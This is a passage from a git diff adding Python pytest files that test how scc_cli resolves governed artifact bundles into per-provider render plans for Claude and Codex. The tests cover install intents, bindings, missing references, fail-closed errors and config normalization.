plan.effective_artifacts == () + assert plan.skipped == ("pending-skill",) + assert any("request-only" in d.reason for d in result.diagnostics) + + def test_required_artifact_included(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={ + "req-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="req-skill", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + bindings={}, + bundles={ + "test": ArtifactBundle(name="test", artifacts=("req-skill",)), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("test",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "t", "claude") + assert result.plans[0].effective_artifacts == ("req-skill",) + + def test_available_artifact_included(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={ + "avail-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="avail-skill", + install_intent=ArtifactInstallIntent.AVAILABLE, + ), + }, + bindings={}, + bundles={ + "test": ArtifactBundle(name="test", artifacts=("avail-skill",)), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("test",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "t", "claude") + assert result.plans[0].effective_artifacts == ("avail-skill",) + + +# --------------------------------------------------------------------------- +# Disabled bundle +# --------------------------------------------------------------------------- + + +class TestDisabledBundle: + def test_disabled_bundle_skipped_entirely(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={ + "good-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="good-skill", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + bindings={}, + bundles={ + "disabled-bundle": ArtifactBundle( + name="disabled-bundle", + artifacts=("good-skill",), + install_intent=ArtifactInstallIntent.DISABLED, + ), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("disabled-bundle",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "t", "claude") + plan = result.plans[0] + assert plan.effective_artifacts == () + assert plan.bindings == () + assert len(result.diagnostics) == 1 + assert "disabled" in result.diagnostics[0].reason + + +# --------------------------------------------------------------------------- +# Missing artifact in bundle +# --------------------------------------------------------------------------- + + +class TestMissingArtifact: + def test_artifact_not_in_catalog(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={}, + bindings={}, + bundles={ + "test": ArtifactBundle(name="test", artifacts=("ghost-artifact",)), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("test",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "t", "claude") + plan = result.plans[0] + assert plan.effective_artifacts == () + assert plan.skipped == ("ghost-artifact",) + assert any("not found" in d.reason for d in result.diagnostics) + + +# --------------------------------------------------------------------------- +# Config normalization round-trip +# --------------------------------------------------------------------------- + + +class TestConfigNormalization: + """Verify governed_artifacts and enabled_bundles survive normalization.""" + + def test_normalizer_round_trip(self) -> None: + """Raw org config with governed_artifacts section normalizes correctly.""" + raw = { + "organization": {"name": "test-org"}, + "governed_artifacts": { + "artifacts": { + "code-review-skill": { + "kind": "skill", + "source": { + "type": "git", + "url": "https://git.example.se/ai/artifacts.git", + "path": "skills/code-review", + "ref": "v1.4.2", + }, + "install_intent": "required", + }, + "github-native": { + "kind": "native_integration", + "install_intent": "available", + "bindings": { + "claude": { + "hooks": "./claude/github-hooks.json", + "marketplace_bundle": "./claude/github-marketplace", + }, + "codex": { + "plugin_bundle": "./codex/github-plugin", + "rules": "./codex/rules/github.rules", + }, + }, + }, + }, + "bundles": { + "github-dev": { + "members": ["code-review-skill", "github-native"], + "install_intent": "available", + }, + }, + }, + "profiles": { + "ai-team": { + "enabled_bundles": ["github-dev"], + }, + }, + } + org = NormalizedOrgConfig.from_dict(raw) + + # Catalog populated + assert "code-review-skill" in org.governed_artifacts.artifacts + assert "github-native" in org.governed_artifacts.artifacts + assert "github-dev" in org.governed_artifacts.bundles + + # Artifact fields + skill = org.governed_artifacts.artifacts["code-review-skill"] + assert skill.kind == ArtifactKind.SKILL + assert skill.install_intent == ArtifactInstallIntent.REQUIRED + assert skill.source_type == "git" + assert skill.source_ref == "v1.4.2" + + # Bindings + native_bindings = org.governed_artifacts.bindings.get("github-native", ()) + assert len(native_bindings) == 2 + providers = {b.provider for b in native_bindings} + assert providers == {"claude", "codex"} + + # Bundle + bundle = org.governed_artifacts.bundles["github-dev"] + assert bundle.artifacts == ("code-review-skill", "github-native") + assert bundle.install_intent == ArtifactInstallIntent.AVAILABLE + + # Team enabled_bundles + team = org.get_profile("ai-team") + assert team is not None + assert team.enabled_bundles == ("github-dev",) + + def test_normalizer_empty_governed_artifacts(self) -> None: + """Org config with no governed_artifacts section produces empty catalog.""" + raw = {"organization": {"name": "test-org"}} + org = NormalizedOrgConfig.from_dict(raw) + assert org.governed_artifacts.artifacts == {} + assert org.governed_artifacts.bundles == {} + assert org.governed_artifacts.bindings == {} + + def test_full_resolution_from_raw_config(self) -> None: + """End-to-end: raw config → normalization → bundle resolution.""" + raw = { + "organization": {"name": "test-org"}, + "governed_artifacts": { + "artifacts": { + "my-skill": { + "kind": "skill", + "install_intent": "required", + }, + "claude-hooks": { + "kind": "native_integration", + "install_intent": "available", + "bindings": { + "claude": {"hooks": "./hooks.json"}, + }, + }, + }, + "bundles": { + "my-bundle": { + "members": ["my-skill", "claude-hooks"], + }, + }, + }, + "profiles": { + "dev-team": { + "enabled_bundles": ["my-bundle"], + }, + }, + } + org = NormalizedOrgConfig.from_dict(raw) + + # Claude gets both + claude_result = resolve_render_plan(org, "dev-team", "claude") + assert len(claude_result.plans) == 1 + assert claude_result.plans[0].effective_artifacts == ("my-skill", "claude-hooks") + + # Codex gets skill but not claude-native integration + codex_result = resolve_render_plan(org, "dev-team", "codex") + assert len(codex_result.plans) == 1 + assert codex_result.plans[0].effective_artifacts == ("my-skill",) + assert codex_result.plans[0].skipped == ("claude-hooks",) + + +# --------------------------------------------------------------------------- +# Return type shape +# --------------------------------------------------------------------------- + + +# --------------------------------------------------------------------------- +# Fail-closed mode +# --------------------------------------------------------------------------- + + +class TestFailClosedMissingBundle: + def test_missing_bundle_raises_bundle_resolution_error(self) -> None: + """fail_closed=True: missing bundle ID raises BundleResolutionError.""" + org = _make_org( + profiles={"t": _make_team("t", bundles=("nonexistent",))}, + ) + with pytest.raises(BundleResolutionError, match="nonexistent"): + resolve_render_plan(org, "t", "claude", fail_closed=True) + + def test_missing_bundle_error_has_available_bundles(self) -> None: + catalog = GovernedArtifactsCatalog( + bundles={ + "alpha": ArtifactBundle(name="alpha", artifacts=()), + "beta": ArtifactBundle(name="beta", artifacts=()), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("ghost",))}, + catalog=catalog, + ) + with pytest.raises(BundleResolutionError) as exc_info: + resolve_render_plan(org, "t", "codex", fail_closed=True) + err = exc_info.value + assert "alpha" in err.available_bundles + assert "beta" in err.available_bundles + assert err.bundle_id == "ghost" + + def test_missing_bundle_error_has_structured_user_message(self) -> None: + org = _make_org( + profiles={"t": _make_team("t", bundles=("gone",))}, + ) + with pytest.raises(BundleResolutionError) as exc_info: + resolve_render_plan(org, "t", "claude", fail_closed=True) + assert "gone" in str(exc_info.value) + + def test_missing_bundle_soft_mode_still_produces_diagnostic(self) -> None: + """Default (fail_closed=False) still returns diagnostics, not errors.""" + org = _make_org( + profiles={"t": _make_team("t", bundles=("missing",))}, + ) + result = resolve_render_plan(org, "t", "claude") + assert len(result.diagnostics) == 1 + assert "not found" in result.diagnostics[0].reason + + +class TestFailClosedInvalidArtifact: + def test_invalid_artifact_ref_raises_error(self) -> None: + """fail_closed=True: artifact not in catalog → InvalidArtifactReferenceError.""" + catalog = GovernedArtifactsCatalog( + bundles={ + "b": ArtifactBundle(name="b", artifacts=("ghost-artifact",)), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("b",))}, + catalog=catalog, + ) + with pytest.raises(InvalidArtifactReferenceError, match="ghost-artifact"): + resolve_render_plan(org, "t", "claude", fail_closed=True) + + def test_invalid_artifact_error_has_bundle_id(self) -> None: + catalog = GovernedArtifactsCatalog( + bundles={ + "my-bundle": ArtifactBundle(name="my-bundle", artifacts=("missing-art",)), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("my-bundle",))}, + catalog=catalog, + ) + with pytest.raises(InvalidArtifactReferenceError) as exc_info: + resolve_render_plan(org, "t", "claude", fail_closed=True) + assert exc_info.value.bundle_id == "my-bundle" + assert exc_info.value.artifact_name == "missing-art" + + def test_disabled_bundle_in_fail_closed_mode_skips_not_raises(self) -> None: + """Disabled bundles produce diagnostics even in fail_closed mode.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "s": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="s", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + bundles={ + "dis": ArtifactBundle( + name="dis", + artifacts=("s",), + install_intent=ArtifactInstallIntent.DISABLED, + ), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("dis",))}, + catalog=catalog, + ) + # Should NOT raise — disabled is an audit skip, not a failure + result = resolve_render_plan(org, "t", "claude", fail_closed=True) + assert len(result.diagnostics) == 1 + assert "disabled" in result.diagnostics[0].reason + + +# --------------------------------------------------------------------------- +# Error hierarchy structure +# --------------------------------------------------------------------------- + + +class TestErrorHierarchy: + def test_bundle_resolution_error_is_renderer_error(self) -> None: + from scc_cli.core.errors import RendererError + + err = BundleResolutionError(bundle_id="b") + assert isinstance(err, RendererError) + + def test_invalid_artifact_error_is_renderer_error(self) -> None: + from scc_cli.core.errors import RendererError + + err = InvalidArtifactReferenceError(bundle_id="b", artifact_name="a", reason="bad") + assert isinstance(err, RendererError) + + def test_renderer_error_has_exit_code_4(self) -> None: + from scc_cli.core.errors import RendererError + + err = RendererError(user_message="test") + assert err.exit_code == 4 + + +class TestReturnTypes: + def test_result_is_bundle_resolution_result(self) -> None: + org = _make_org(profiles={"t": _make_team("t")}) + result = resolve_render_plan(org, "t", "claude") + assert isinstance(result, BundleResolutionResult) + + def test_plan_is_artifact_render_plan(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={ + "s": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="s", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + bundles={ + "b": ArtifactBundle(name="b", artifacts=("s",)), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("b",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "t", "claude") + assert isinstance(result.plans[0], ArtifactRenderPlan) + + def test_diagnostic_is_typed(self) -> None: + catalog = GovernedArtifactsCatalog( + bundles={ + "b": ArtifactBundle(name="b", artifacts=("missing",)), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("b",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "t", "claude") + assert isinstance(result.diagnostics[0], BundleResolutionDiagnostic) diff --git a/tests/test_bundle_resolver_contracts.py b/tests/test_bundle_resolver_contracts.py new file mode 100644 index 0000000..5c23a68 --- /dev/null +++ b/tests/test_bundle_resolver_contracts.py @@ -0,0 +1,885 @@ +"""Contract tests for bundle resolution and render plan computation. + +These tests exercise the public contract of ``resolve_render_plan()`` and +``_resolve_single_bundle()`` to ensure the planning pipeline meets its +documented behavior guarantees: + +1. Happy path → complete ArtifactRenderPlan with correct bindings +2. Multi-bundle → artifacts per-bundle, ordered as declared +3. Shared artifacts → skill + MCP in plan for both providers +4. Provider-specific → native_integration appears for matching provider only +5. Install intent filtering → disabled excluded, required included, available preserved +6. Missing bundle → clear error with available bundles +7. Missing artifact in bundle → partial resolution with skip report +8. Empty team config → empty plan, no error +9. Structural contracts → return types, immutability, tuple shapes +""" + +from __future__ import annotations + +import pytest + +from scc_cli.core.bundle_resolver import ( + BundleResolutionDiagnostic, + BundleResolutionResult, + _resolve_single_bundle, + resolve_render_plan, +) +from scc_cli.core.errors import ( + BundleResolutionError, + InvalidArtifactReferenceError, +) +from scc_cli.core.governed_artifacts import ( + ArtifactBundle, + ArtifactInstallIntent, + ArtifactKind, + ArtifactRenderPlan, + GovernedArtifact, + ProviderArtifactBinding, +) +from scc_cli.ports.config_models import ( + GovernedArtifactsCatalog, + NormalizedOrgConfig, + NormalizedTeamConfig, + OrganizationInfo, +) + +# --------------------------------------------------------------------------- +# Fixture helpers +# --------------------------------------------------------------------------- + + +def _org( + *, + profiles: dict[str, NormalizedTeamConfig] | None = None, + catalog: GovernedArtifactsCatalog | None = None, +) -> NormalizedOrgConfig: + return NormalizedOrgConfig( + organization=OrganizationInfo(name="contract-test-org"), + profiles=profiles or {}, + governed_artifacts=catalog or GovernedArtifactsCatalog(), + ) + + +def _team(name: str, bundles: tuple[str, ...] = ()) -> NormalizedTeamConfig: + return NormalizedTeamConfig(name=name, enabled_bundles=bundles) + + +def _skill( + name: str, intent: ArtifactInstallIntent = ArtifactInstallIntent.REQUIRED +) -> GovernedArtifact: + return GovernedArtifact(kind=ArtifactKind.SKILL, name=name, install_intent=intent) + + +def _mcp( + name: str, intent: ArtifactInstallIntent = ArtifactInstallIntent.REQUIRED +) -> GovernedArtifact: + return GovernedArtifact(kind=ArtifactKind.MCP_SERVER, name=name, install_intent=intent) + + +def _native( + name: str, intent: ArtifactInstallIntent = ArtifactInstallIntent.AVAILABLE +) -> GovernedArtifact: + return GovernedArtifact(kind=ArtifactKind.NATIVE_INTEGRATION, name=name, install_intent=intent) + + +# --------------------------------------------------------------------------- +# Reusable catalog: a realistic bundle with all artifact kinds +# --------------------------------------------------------------------------- + +_FULL_CATALOG = GovernedArtifactsCatalog( + artifacts={ + "review-skill": _skill("review-skill"), + "lint-skill": _skill("lint-skill"), + "github-mcp": _mcp("github-mcp"), + "jira-mcp": _mcp("jira-mcp"), + "claude-hooks": _native("claude-hooks"), + "codex-rules": _native("codex-rules"), + "shared-native": _native("shared-native"), + }, + bindings={ + "review-skill": ( + ProviderArtifactBinding(provider="claude", native_ref="skills/review"), + ProviderArtifactBinding(provider="codex", native_ref="skills/review"), + ), + "github-mcp": (ProviderArtifactBinding(provider="claude", native_ref="mcp/github"),), + "claude-hooks": ( + ProviderArtifactBinding( + provider="claude", + native_config={"hooks": "./claude/hooks.json"}, + ), + ), + "codex-rules": ( + ProviderArtifactBinding( + provider="codex", + native_config={"rules": "./codex/github.rules"}, + ), + ), + "shared-native": ( + ProviderArtifactBinding( + provider="claude", + native_config={"hooks": "./claude/shared-hooks.json"}, + ), + ProviderArtifactBinding( + provider="codex", + native_config={"rules": "./codex/shared.rules"}, + ), + ), + }, + bundles={ + "dev-essentials": ArtifactBundle( + name="dev-essentials", + artifacts=("review-skill", "lint-skill", "github-mcp"), + install_intent=ArtifactInstallIntent.AVAILABLE, + ), + "github-integration": ArtifactBundle( + name="github-integration", + artifacts=("github-mcp", "claude-hooks", "codex-rules", "shared-native"), + install_intent=ArtifactInstallIntent.AVAILABLE, + ), + "empty-bundle": ArtifactBundle( + name="empty-bundle", + artifacts=(), + install_intent=ArtifactInstallIntent.AVAILABLE, + ), + }, +) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Contract 1: Happy path — complete ArtifactRenderPlan +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestHappyPathContract: + """Team with enabled bundles → complete ArtifactRenderPlan with correct + bindings and effective_artifacts.""" + + def test_plan_has_correct_bundle_id(self) -> None: + org = _org( + profiles={"team": _team("team", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + assert result.plans[0].bundle_id == "dev-essentials" + + def test_plan_has_correct_provider(self) -> None: + org = _org( + profiles={"team": _team("team", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + assert result.plans[0].provider == "claude" + + def test_effective_artifacts_match_bundle_contents(self) -> None: + """All artifacts with compatible intent appear as effective.""" + org = _org( + profiles={"team": _team("team", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + plan = result.plans[0] + # dev-essentials has: review-skill, lint-skill, github-mcp — all REQUIRED + assert plan.effective_artifacts == ("review-skill", "lint-skill", "github-mcp") + + def test_bindings_match_provider(self) -> None: + """Every binding in the plan targets the requested provider.""" + org = _org( + profiles={"team": _team("team", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + for binding in result.plans[0].bindings: + assert binding.provider == "claude" + + def test_bindings_count_matches_provider_bindings(self) -> None: + """Binding count equals catalog bindings for the provider.""" + org = _org( + profiles={"team": _team("team", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + plan = result.plans[0] + # review-skill has claude binding, lint-skill has none, github-mcp has claude binding + assert len(plan.bindings) == 2 + + def test_no_diagnostics_on_clean_resolution(self) -> None: + org = _org( + profiles={"team": _team("team", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + assert result.diagnostics == () + + def test_no_skipped_artifacts_on_clean_resolution(self) -> None: + org = _org( + profiles={"team": _team("team", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + assert result.plans[0].skipped == () + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Contract 2: Multi-bundle — artifacts per bundle, ordered +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestMultiBundleContract: + """Team enables multiple bundles → one plan per bundle, artifacts ordered + as declared in the bundle definition.""" + + def test_one_plan_per_enabled_bundle(self) -> None: + org = _org( + profiles={"team": _team("team", bundles=("dev-essentials", "github-integration"))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + assert len(result.plans) == 2 + + def test_plans_ordered_as_enabled_bundles(self) -> None: + org = _org( + profiles={"team": _team("team", bundles=("github-integration", "dev-essentials"))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + assert result.plans[0].bundle_id == "github-integration" + assert result.plans[1].bundle_id == "dev-essentials" + + def test_artifacts_ordered_as_declared_in_bundle(self) -> None: + """Effective artifacts preserve the order from the bundle definition.""" + org = _org( + profiles={"team": _team("team", bundles=("dev-essentials",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + plan = result.plans[0] + # Bundle declares: review-skill, lint-skill, github-mcp + assert plan.effective_artifacts == ("review-skill", "lint-skill", "github-mcp") + + def test_each_bundle_resolves_independently(self) -> None: + """Same artifact in two bundles appears in both plans (no cross-bundle dedup).""" + catalog = GovernedArtifactsCatalog( + artifacts={"shared": _skill("shared")}, + bindings={}, + bundles={ + "a": ArtifactBundle(name="a", artifacts=("shared",)), + "b": ArtifactBundle(name="b", artifacts=("shared",)), + }, + ) + org = _org( + profiles={"team": _team("team", bundles=("a", "b"))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "team", "claude") + assert result.plans[0].effective_artifacts == ("shared",) + assert result.plans[1].effective_artifacts == ("shared",) + + def test_diagnostics_aggregated_across_bundles(self) -> None: + """Diagnostics from multiple bundles are collected into one result.""" + catalog = GovernedArtifactsCatalog( + artifacts={}, + bindings={}, + bundles={ + "a": ArtifactBundle(name="a", artifacts=("ghost-1",)), + "b": ArtifactBundle(name="b", artifacts=("ghost-2",)), + }, + ) + org = _org( + profiles={"team": _team("team", bundles=("a", "b"))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "team", "claude") + assert len(result.diagnostics) == 2 + names = {d.artifact_name for d in result.diagnostics} + assert names == {"ghost-1", "ghost-2"} + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Contract 3: Shared artifacts — portable across providers +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestSharedArtifactContract: + """Skill and MCP artifacts appear in plan for both providers — they are + portable and do not require provider-specific bindings.""" + + def test_skill_effective_for_both_providers(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={"portable-skill": _skill("portable-skill")}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("portable-skill",))}, + ) + org = _org( + profiles={"team": _team("team", bundles=("b",))}, + catalog=catalog, + ) + claude = resolve_render_plan(org, "team", "claude") + codex = resolve_render_plan(org, "team", "codex") + assert claude.plans[0].effective_artifacts == ("portable-skill",) + assert codex.plans[0].effective_artifacts == ("portable-skill",) + + def test_mcp_effective_for_both_providers(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={"portable-mcp": _mcp("portable-mcp")}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("portable-mcp",))}, + ) + org = _org( + profiles={"team": _team("team", bundles=("b",))}, + catalog=catalog, + ) + claude = resolve_render_plan(org, "team", "claude") + codex = resolve_render_plan(org, "team", "codex") + assert claude.plans[0].effective_artifacts == ("portable-mcp",) + assert codex.plans[0].effective_artifacts == ("portable-mcp",) + + def test_skill_without_binding_has_empty_bindings_list(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={"no-bind-skill": _skill("no-bind-skill")}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("no-bind-skill",))}, + ) + org = _org( + profiles={"team": _team("team", bundles=("b",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "team", "claude") + assert result.plans[0].bindings == () + assert result.plans[0].effective_artifacts == ("no-bind-skill",) + + def test_mcp_with_one_provider_binding_collects_only_matching(self) -> None: + """MCP with only a claude binding: effective for both, but codex gets + no bindings while claude gets one.""" + catalog = GovernedArtifactsCatalog( + artifacts={"github-mcp": _mcp("github-mcp")}, + bindings={ + "github-mcp": ( + ProviderArtifactBinding(provider="claude", native_ref="mcp/github"), + ), + }, + bundles={"b": ArtifactBundle(name="b", artifacts=("github-mcp",))}, + ) + org = _org( + profiles={"team": _team("team", bundles=("b",))}, + catalog=catalog, + ) + claude = resolve_render_plan(org, "team", "claude") + codex = resolve_render_plan(org, "team", "codex") + # Both see the artifact as effective (MCP is portable) + assert claude.plans[0].effective_artifacts == ("github-mcp",) + assert codex.plans[0].effective_artifacts == ("github-mcp",) + # Only claude gets the binding + assert len(claude.plans[0].bindings) == 1 + assert len(codex.plans[0].bindings) == 0 + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Contract 4: Provider-specific — native_integration binding +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderSpecificContract: + """Native integrations require a provider-specific binding. They appear + for the matching provider and are skipped for others.""" + + def test_native_with_claude_binding_effective_for_claude(self) -> None: + org = _org( + profiles={"team": _team("team", bundles=("github-integration",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + plan = result.plans[0] + assert "claude-hooks" in plan.effective_artifacts + assert "claude-hooks" not in plan.skipped + + def test_native_with_claude_binding_skipped_for_codex(self) -> None: + org = _org( + profiles={"team": _team("team", bundles=("github-integration",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "codex") + plan = result.plans[0] + assert "claude-hooks" in plan.skipped + assert "claude-hooks" not in plan.effective_artifacts + + def test_native_with_codex_binding_effective_for_codex(self) -> None: + org = _org( + profiles={"team": _team("team", bundles=("github-integration",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "codex") + plan = result.plans[0] + assert "codex-rules" in plan.effective_artifacts + + def test_native_with_codex_binding_skipped_for_claude(self) -> None: + org = _org( + profiles={"team": _team("team", bundles=("github-integration",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "claude") + plan = result.plans[0] + assert "codex-rules" in plan.skipped + + def test_native_with_both_bindings_effective_for_both(self) -> None: + """shared-native has bindings for both claude and codex.""" + org = _org( + profiles={"team": _team("team", bundles=("github-integration",))}, + catalog=_FULL_CATALOG, + ) + claude = resolve_render_plan(org, "team", "claude") + codex = resolve_render_plan(org, "team", "codex") + assert "shared-native" in claude.plans[0].effective_artifacts + assert "shared-native" in codex.plans[0].effective_artifacts + + def test_skip_diagnostic_mentions_provider(self) -> None: + """Diagnostic for skipped native integration names the provider.""" + org = _org( + profiles={"team": _team("team", bundles=("github-integration",))}, + catalog=_FULL_CATALOG, + ) + result = resolve_render_plan(org, "team", "codex") + claude_only_diags = [d for d in result.diagnostics if d.artifact_name == "claude-hooks"] + assert len(claude_only_diags) == 1 + assert "codex" in claude_only_diags[0].reason + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Contract 5: Install intent filtering +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestInstallIntentContract: + """Disabled artifacts excluded, required auto-included, available preserved, + request-only skipped.""" + + def test_required_is_effective(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={"r": _skill("r", ArtifactInstallIntent.REQUIRED)}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("r",))}, + ) + org = _org(profiles={"t": _team("t", bundles=("b",))}, catalog=catalog) + result = resolve_render_plan(org, "t", "claude") + assert "r" in result.plans[0].effective_artifacts + + def test_available_is_effective(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={"a": _skill("a", ArtifactInstallIntent.AVAILABLE)}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("a",))}, + ) + org = _org(profiles={"t": _team("t", bundles=("b",))}, catalog=catalog) + result = resolve_render_plan(org, "t", "claude") + assert "a" in result.plans[0].effective_artifacts + + def test_disabled_is_skipped(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={"d": _skill("d", ArtifactInstallIntent.DISABLED)}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("d",))}, + ) + org = _org(profiles={"t": _team("t", bundles=("b",))}, catalog=catalog) + result = resolve_render_plan(org, "t", "claude") + assert result.plans[0].effective_artifacts == () + assert "d" in result.plans[0].skipped + + def test_request_only_is_skipped(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={"ro": _skill("ro", ArtifactInstallIntent.REQUEST_ONLY)}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("ro",))}, + ) + org = _org(profiles={"t": _team("t", bundles=("b",))}, catalog=catalog) + result = resolve_render_plan(org, "t", "claude") + assert result.plans[0].effective_artifacts == () + assert "ro" in result.plans[0].skipped + + def test_disabled_diagnostic_reason(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={"d": _skill("d", ArtifactInstallIntent.DISABLED)}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("d",))}, + ) + org = _org(profiles={"t": _team("t", bundles=("b",))}, catalog=catalog) + result = resolve_render_plan(org, "t", "claude") + assert any("disabled" in d.reason for d in result.diagnostics) + + def test_request_only_diagnostic_reason(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={"ro": _skill("ro", ArtifactInstallIntent.REQUEST_ONLY)}, + bindings={}, + bundles={"b": ArtifactBundle(name="b", artifacts=("ro",))}, + ) + org = _org(profiles={"t": _team("t", bundles=("b",))}, catalog=catalog) + result = resolve_render_plan(org, "t", "claude") + assert any("request-only" in d.reason for d in result.diagnostics) + + def test_mixed_intents_only_effective_included(self) -> None: + """Bundle with mixed intents: only required + available in effective.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "req": _skill("req", ArtifactInstallIntent.REQUIRED), + "avail": _skill("avail", ArtifactInstallIntent.AVAILABLE), + "dis": _skill("dis", ArtifactInstallIntent.DISABLED), + "ro": _skill("ro", ArtifactInstallIntent.REQUEST_ONLY), + }, + bindings={}, + bundles={ + "mixed": ArtifactBundle( + name="mixed", + artifacts=("req", "avail", "dis", "ro"), + ), + }, + ) + org = _org( + profiles={"t": _team("t", bundles=("mixed",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "t", "claude") + plan = result.plans[0] + assert plan.effective_artifacts == ("req", "avail") + assert set(plan.skipped) == {"dis", "ro"} + + def test_disabled_bundle_intent_skips_all_artifacts(self) -> None: + """A disabled bundle skips resolution entirely, even for required artifacts.""" + catalog = GovernedArtifactsCatalog( + artifacts={"s": _skill("s", ArtifactInstallIntent.REQUIRED)}, + bindings={}, + bundles={ + "dis-bundle": ArtifactBundle( + name="dis-bundle", + artifacts=("s",), + install_intent=ArtifactInstallIntent.DISABLED, + ), + }, + ) + org = _org( + profiles={"t": _team("t", bundles=("dis-bundle",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "t", "claude") + plan = result.plans[0] + assert plan.effective_artifacts == () + assert plan.bindings == () + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Contract 6: Missing bundle reference +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestMissingBundleContract: + """Missing bundle → clear error message listing available bundles.""" + + def test_soft_mode_produces_diagnostic(self) -> None: + catalog = GovernedArtifactsCatalog( + bundles={"real-bundle": ArtifactBundle(name="real-bundle")}, + ) + org = _org( + profiles={"t": _team("t", bundles=("nonexistent",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "t", "claude") + assert len(result.diagnostics) == 1 + assert "not found" in result.diagnostics[0].reason + assert "real-bundle" in result.diagnostics[0].reason + + def test_soft_mode_still_returns_plan_shell(self) -> None: + """Even a missing bundle produces a plan (with empty effective_artifacts).""" + org = _org(profiles={"t": _team("t", bundles=("ghost",))}) + result = resolve_render_plan(org, "t", "claude") + assert len(result.plans) == 1 + assert result.plans[0].bundle_id == "ghost" + assert result.plans[0].effective_artifacts == () + + def test_fail_closed_raises_bundle_resolution_error(self) -> None: + org = _org(profiles={"t": _team("t", bundles=("missing",))}) + with pytest.raises(BundleResolutionError) as exc_info: + resolve_render_plan(org, "t", "claude", fail_closed=True) + assert exc_info.value.bundle_id == "missing" + + def test_fail_closed_error_lists_available_bundles(self) -> None: + catalog = GovernedArtifactsCatalog( + bundles={ + "alpha": ArtifactBundle(name="alpha"), + "beta": ArtifactBundle(name="beta"), + "gamma": ArtifactBundle(name="gamma"), + }, + ) + org = _org( + profiles={"t": 